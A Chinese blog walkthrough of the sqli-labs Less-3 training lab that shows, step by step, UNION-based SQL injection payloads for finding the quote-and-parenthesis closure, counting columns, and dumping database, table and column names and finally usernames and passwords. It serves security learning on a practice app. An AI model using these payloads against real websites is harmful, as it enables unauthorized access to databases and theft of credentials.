SQL注入实例(sqli-labs/less-3)

魏大橙2024-08-04 12:34

0、初始页面

1、确定闭合字符

确定为字符型注入

复制代码 
?id=1 and 1=1 
?id=1 and 1=2

确定闭合字符为 ')

复制代码 
?id=1'
?id=1')

2、确定表的列数

确定查询表的列数为3

复制代码 
?id=1') order by 3 --+

3、确定回显位置

确定回显位置为第二列和第三列

复制代码 
?id=-1') union select 1,2,3 --+

4、爆库名

当前所在数据库为security

复制代码 
?id=-1') union select 1,user(),database() --+

5、爆表名

查看users表

复制代码 
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

6、爆列名

复制代码 
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' --+

7、显示最终结果

复制代码 
?id=-1%27) union select 1,2,group_concat(username,0x3a,password) from security.users --+
相关推荐
天空属于哈夫克313 分钟前
企业微信 API 发消息接口:支持私聊、群聊及多种媒体格式
数据库·微信·自动化·企业微信
高铭杰22 分钟前
Postgresql源码(158)pg_filenode.map文件作用relmap和redo流程(RM_RELMAP_ID = 7)
数据库·postgresql·relmap·pg_filenode.map
秦jh_38 分钟前
【Redis】初识高并发分布式和Redis
数据库·redis·缓存
远方16091 小时前
115-使用freesql体验Oracle 多版本特性
大数据·数据库·sql·ai·oracle·database
happymaker06261 小时前
JDBC(MySQL)——DAY01
数据库·mysql
qqacj1 小时前
MSSQL2022的一个错误:未在本地计算机上注册“Microsoft.ACE.OLEDB.16.0”提供程序
数据库·microsoft
ren049181 小时前
MySQL
数据库·mysql
良逍Ai出海1 小时前
OpenClaw 新手最该先搞懂的 2 套命令
android·java·数据库
Keanu-1 小时前
Redis 主从复制及哨兵模式配置
服务器·数据库·redis
blues92572 小时前
【JOIN】关键字在MySql中的详细使用
数据库·mysql
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03本地部署 OpenClaw + DeepSeek-R1 完全指南04Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南05OpenClaw 飞书机器人不回复消息?3 小时踩坑总结06得物前端部门,没了07OpenClaw macOS 完整安装与本地模型配置教程(实战版)08OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录09Window 10部署openclaw报错node.exe : npm error code 12810OpenClaw 接入 QQ Bot 完整实践指南